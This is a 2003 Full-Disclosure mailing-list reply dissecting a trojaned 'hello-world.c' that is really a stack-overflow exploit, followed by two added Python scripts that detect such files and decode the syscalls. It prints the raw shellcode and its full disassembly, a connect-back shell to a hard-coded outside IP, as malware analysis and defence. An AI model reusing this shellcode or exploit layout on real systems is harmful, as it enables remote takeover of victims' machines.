Message-ID: <Law15-F68Jf7zynrvDO00027683@hotmail.com>
From: davek_throwaway at hotmail.com (Dave Korn)
Subject: tripbid secure codes
----- Original Message -----
From: <auto94042@...hmail.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Friday, June 27, 2003 6:25 AM
Subject: [Full-Disclosure] tripbid secure codes
> i post the thing to the vuln dev some days ago and get quite a big
> response.
> not only do i get a heart 2 heart with n1xo reiman about portmon ! but
> some folks want me to look at the code they make, specially a 'hello-world.c'
> progie -> " holo, can you check my hello-world.c for strcpy
> ?? securecode do the trick " <- paraphrase the msg, i rm -rf / it since
> it make me anger and stress it !
>
> i am willing to try the secure code since the grep 'strcpy' is losing
> his thrills so i trick around with :
> [user@...alhost]$ ./securecode -s hello-world.c
Never ever EVER run an insecure program over arbitrary data you receive from
the net without checking it for safety first..... Let's look at this
hello-world.c before we run anything on it....
Z:\sploits-misc\targzip>type hello-world.c
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!?
?!? ?!? ?!? ?!? ?!? ?!?
?!??ииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииии1?1?1?Q??Q??Q??QКъ???f?гК?1?1?QQh?b??fh????fQК???SWRКъ???f?г1?9?t?1????г1???К??г1???К????г1???К????г1?1?Phn/shh//biК?PSКъ???г1????г
Heh. Boy, did j00 get hax0red! Here's what's actually in that file:
$0000 - $00ff: 'A' x 256
$0100 - $011f: DWORD $bffff321 x 8
$0120 - $0378: $90 = NOP x 600
$0378 - $03fa: Binary shellcode
$03fb - $03fc: CR, LF
<EOF>
In other words, it's one very long line. Looks to me like the securecode
program reads each line of the .c file into a buffer that's only 256 bytes
long; this exploit fills it with 'A', then overwrites the return address on
the stack with a pointer into the NOP slide. Here's a disassembly of the
shellcode: note that offset 0 in this disassembly is offset $0370 in the
file. Sorry for not commenting this, but I don't speak linux asm; however I
can see a whole bunch of syscalls going on in there; the values in eax
should tell you whether anything nastier than a few mkdirs was done to
you...
Z:\sploits-misc\targzip>objdump -D --target=binary hello-world2.bin --architecture=i386
hello-world2.bin: file format binary
objdump: hello-world2.bin: no symbols
Disassembly of section .data:
00000000 <.data>:
0: 90 nop
1: 90 nop
2: 90 nop
3: 90 nop
4: 90 nop
5: 90 nop
6: 90 nop
7: 90 nop
8: 90 nop
9: 31 c0 xor %eax,%eax
b: 31 db xor %ebx,%ebx
d: 31 c9 xor %ecx,%ecx
f: 51 push %ecx
10: b1 06 mov $0x6,%cl
12: 51 push %ecx
13: b1 01 mov $0x1,%cl
15: 51 push %ecx
16: b1 02 mov $0x2,%cl
18: 51 push %ecx
19: 89 e1 mov %esp,%ecx
1b: b3 01 mov $0x1,%bl
1d: b0 66 mov $0x66,%al
1f: cd 80 int $0x80
21: 89 c2 mov %eax,%edx
23: 31 c0 xor %eax,%eax
25: 31 c9 xor %ecx,%ecx
27: 51 push %ecx
28: 51 push %ecx
29: 68 d4 62 f7 cc push $0xccf762d4
2e: 66 68 b0 ef pushw $0xefb0
32: b1 02 mov $0x2,%cl
34: 66 51 push %cx
36: 89 e7 mov %esp,%edi
38: b3 10 mov $0x10,%bl
3a: 53 push %ebx
3b: 57 push %edi
3c: 52 push %edx
3d: 89 e1 mov %esp,%ecx
3f: b3 03 mov $0x3,%bl
41: b0 66 mov $0x66,%al
43: cd 80 int $0x80
45: 31 c9 xor %ecx,%ecx
47: 39 c1 cmp %eax,%ecx
49: 74 06 je 0x51
4b: 31 c0 xor %eax,%eax
4d: b0 01 mov $0x1,%al
4f: cd 80 int $0x80
51: 31 c0 xor %eax,%eax
53: b0 3f mov $0x3f,%al
55: 89 d3 mov %edx,%ebx
57: cd 80 int $0x80
59: 31 c0 xor %eax,%eax
5b: b0 3f mov $0x3f,%al
5d: 89 d3 mov %edx,%ebx
5f: b1 01 mov $0x1,%cl
61: cd 80 int $0x80
63: 31 c0 xor %eax,%eax
65: b0 3f mov $0x3f,%al
67: 89 d3 mov %edx,%ebx
69: b1 02 mov $0x2,%cl
6b: cd 80 int $0x80
6d: 31 c0 xor %eax,%eax
6f: 31 d2 xor %edx,%edx
71: 50 push %eax
72: 68 6e 2f 73 68 push $0x68732f6e
77: 68 2f 2f 62 69 push $0x69622f2f
7c: 89 e3 mov %esp,%ebx
7e: 50 push %eax
7f: 53 push %ebx
80: 89 e1 mov %esp,%ecx
82: b0 0b mov $0xb,%al
84: cd 80 int $0x80
86: 31 c0 xor %eax,%eax
88: b0 01 mov $0x1,%al
8a: cd 80 int $0x80
8c: 0d .byte 0xd
8d: 0a .byte 0xa
DaveK
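The first lesson of the post is the one DaveK opens with: look at the file before you feed it to anything. The following script is an added example, not part of the original message or of the securecode tool; it checks a file that claims to be C source for the exact shape recovered above (a line longer than a 256-byte line buffer, a run of filler, one DWORD repeated back to back, a NOP sled, raw binary). The thresholds, the benign sample and the constructed payload-shaped sample are assumptions; the payload region in the sample is arbitrary filler, not the shellcode from the listing.

```python
"""Triage a file that claims to be C source before any tool reads it,
checking for the layout DaveK recovered from hello-world.c: one very
long line, a run of filler bytes, one DWORD repeated back to back (a
sprayed return address), a NOP sled and a stretch of raw binary.
Added example; thresholds and sample files are assumptions, not from
the original post."""
import struct
from collections import namedtuple

Finding = namedtuple("Finding", "kind offset length detail")

# Constructed stand-ins: a benign source file, and a file laid out like the
# table in the post (the payload region is arbitrary bytes, not the shellcode).
BENIGN_SOURCE = b'#include <stdio.h>\nint main(void) { puts("hello, world"); return 0; }\n'


def build_sample_payload() -> bytes:
    filler = b"A" * 256                              # $0000-$00ff
    ret_spray = struct.pack("<I", 0xBFFFF321) * 8    # $0100-$011f
    sled = b"\x90" * 600                              # $0120-$0377
    blob = bytes(range(0x80, 0xC0))                   # placeholder for the binary payload
    return filler + ret_spray + sled + blob + b"\r\n"


def byte_runs(data: bytes, min_len: int):
    """Yield (offset, length, value) for every run of one byte at least min_len long."""
    i = 0
    while i < len(data):
        j = i + 1
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i >= min_len:
            yield i, j - i, data[i]
        i = j


def repeated_dword(data: bytes, min_reps: int = 4):
    """Longest stretch of one 4-byte value repeated back to back, as
    (offset, repetitions, little-endian value); runs of a single byte are
    skipped because they are filler, not pointers."""
    best = None
    i = 0
    while i + 4 <= len(data):
        chunk = data[i:i + 4]
        reps = 1
        while data[i + 4 * reps:i + 4 * reps + 4] == chunk:
            reps += 1
        if reps >= min_reps:
            if len(set(chunk)) > 1 and (best is None or reps > best[1]):
                best = (i, reps, struct.unpack("<I", chunk)[0])
            i += 4 * reps
        else:
            i += 1
    return best


def triage(data: bytes, line_buf: int = 256, run_min: int = 64, sled_min: int = 32):
    """Return the list of findings for one file; an empty list means nothing stood out."""
    findings = []
    off = 0
    for line in data.split(b"\n"):
        # A line this long does not fit the line buffer the reader is assumed to use.
        if len(line) >= line_buf:
            findings.append(Finding("long_line", off, len(line),
                                    f"line longer than a {line_buf}-byte line buffer"))
        off += len(line) + 1
    for start, length, value in byte_runs(data, sled_min):
        if value == 0x90:
            findings.append(Finding("nop_sled", start, length, "run of 0x90 (i386 NOP)"))
        elif length >= run_min:
            findings.append(Finding("filler", start, length, f"run of byte {value:#04x}"))
    spray = repeated_dword(data)
    if spray:
        findings.append(Finding("repeated_dword", spray[0], spray[1] * 4,
                                f"{spray[1]} copies of {spray[2]:#010x} (repeated pointer)"))
    binary = [i for i, b in enumerate(data) if not (0x20 <= b < 0x7F or b in b"\t\r\n")]
    if binary:
        findings.append(Finding("binary", binary[0], len(binary), "bytes outside printable ASCII"))
    return findings


def is_suspicious(data: bytes) -> bool:
    """C source never needs a sled, a pointer spray or a line that overflows the reader."""
    return any(f.kind in ("long_line", "nop_sled", "repeated_dword") for f in triage(data))


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_SOURCE), ("payload", build_sample_payload())):
        print(name, "suspicious" if is_suspicious(sample) else "clean")
        for f in triage(sample):
            print(f"  {f.kind:15s} @{f.offset:#06x} len={f.length:<4d} {f.detail}")
```

Running it on the constructed sample reports all five findings in file order, with the repeated DWORD decoded to 0xbffff321 as in the table above; the benign file produces none. The line-length check is the cheapest of the five and on its own would have stopped this particular file from ever reaching the 256-byte buffer.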
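DaveK leaves the reader to look up the eax values at each `int $0x80`. The script below is an added example, not part of the original message: it tracks the immediates moved into eax and ebx across an i386 objdump listing and names the Linux syscall each `int $0x80` makes, treating eax as unknown after each call since it then holds the return value. The embedded listing is an excerpt of the objdump output above (only the lines that set eax/ebx or trap), the regular expression assumes objdump's default AT&T layout, and the two lookup tables cover only the syscall numbers this listing uses.

```python
"""Annotate an i386 objdump listing with the Linux syscall behind each
`int $0x80`, following the hint that the value in eax tells you what the
shellcode does.  Added example, not part of the original post; the
register model is deliberately small (xor-self, mov immediate, mov
register) and the tables only cover the numbers seen in this listing."""
import re

# Linux i386 syscall numbers (arch/x86/entry/syscalls/syscall_32.tbl).
SYSCALLS = {0x01: "exit", 0x03: "read", 0x04: "write", 0x0B: "execve",
            0x3F: "dup2", 0x66: "socketcall"}
# socketcall(2) multiplexes the socket API; the sub-call number travels in ebx.
SOCKETCALLS = {1: "socket", 2: "bind", 3: "connect", 4: "listen", 5: "accept"}

# Excerpt of DaveK's objdump output above: lines that touch eax/ebx or trap.
LISTING = """\
9: 31 c0 xor %eax,%eax
b: 31 db xor %ebx,%ebx
1b: b3 01 mov $0x1,%bl
1d: b0 66 mov $0x66,%al
1f: cd 80 int $0x80
21: 89 c2 mov %eax,%edx
23: 31 c0 xor %eax,%eax
38: b3 10 mov $0x10,%bl
3f: b3 03 mov $0x3,%bl
41: b0 66 mov $0x66,%al
43: cd 80 int $0x80
4b: 31 c0 xor %eax,%eax
4d: b0 01 mov $0x1,%al
4f: cd 80 int $0x80
51: 31 c0 xor %eax,%eax
53: b0 3f mov $0x3f,%al
55: 89 d3 mov %edx,%ebx
57: cd 80 int $0x80
59: 31 c0 xor %eax,%eax
5b: b0 3f mov $0x3f,%al
5d: 89 d3 mov %edx,%ebx
61: cd 80 int $0x80
63: 31 c0 xor %eax,%eax
65: b0 3f mov $0x3f,%al
67: 89 d3 mov %edx,%ebx
6b: cd 80 int $0x80
6d: 31 c0 xor %eax,%eax
7c: 89 e3 mov %esp,%ebx
82: b0 0b mov $0xb,%al
84: cd 80 int $0x80
86: 31 c0 xor %eax,%eax
88: b0 01 mov $0x1,%al
8a: cd 80 int $0x80
"""

# offset: hex bytes... mnemonic [operands]   (objdump AT&T layout, assumed)
LINE = re.compile(r"^\s*([0-9a-f]+):\s+((?:[0-9a-f]{2}\s+)+)(\S+)(?:\s+(\S+))?\s*$")
FULL = {"%eax": "eax", "%ebx": "ebx", "%ecx": "ecx", "%edx": "edx"}
LOW8 = {"%al": "eax", "%bl": "ebx", "%cl": "ecx", "%dl": "edx"}


def parse_imm(tok: str) -> int:
    return int(tok.lstrip("$"), 0)


def decode_syscalls(listing: str):
    """Return [(offset, name), ...] for every int $0x80 whose eax value can be tracked."""
    regs = {r: None for r in ("eax", "ebx", "ecx", "edx")}   # None = unknown
    calls = []
    for raw in listing.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        off, mnem = int(m.group(1), 16), m.group(3)
        ops = (m.group(4) or "").split(",")
        if mnem == "xor" and len(ops) == 2 and ops[0] == ops[1] and ops[0] in FULL:
            regs[FULL[ops[0]]] = 0                       # xor %r,%r zeroes r
        elif mnem == "mov" and len(ops) == 2:
            src, dst = ops
            if dst in FULL:                               # 32-bit move: immediate or tracked register
                regs[FULL[dst]] = parse_imm(src) if src.startswith("$") else regs.get(FULL.get(src))
            elif dst in LOW8:                             # 8-bit move into the low byte
                reg = LOW8[dst]
                if src.startswith("$") and regs[reg] is not None:
                    regs[reg] = (regs[reg] & ~0xFF) | (parse_imm(src) & 0xFF)
                else:
                    regs[reg] = None
        elif mnem == "int" and ops == ["$0x80"]:
            nr = regs["eax"]
            name = "unknown" if nr is None else SYSCALLS.get(nr, f"syscall_{nr}")
            if name == "socketcall":
                name += "/" + SOCKETCALLS.get(regs["ebx"], "?")
            calls.append((off, name))
            regs["eax"] = None                            # eax now holds the return value
    return calls


if __name__ == "__main__":
    for off, name in decode_syscalls(LISTING):
        print(f"{off:4x}: {name}")
```

The output reads socketcall/socket, socketcall/connect, a conditional exit, three dup2 calls, execve and exit: a socket is opened and connected, the descriptor is copied over stdin, stdout and stderr, and a shell is executed on it. That is considerably nastier than a few mkdirs, and it is exactly what a defender wants to know before deciding whether the host the file was run on can still be trusted.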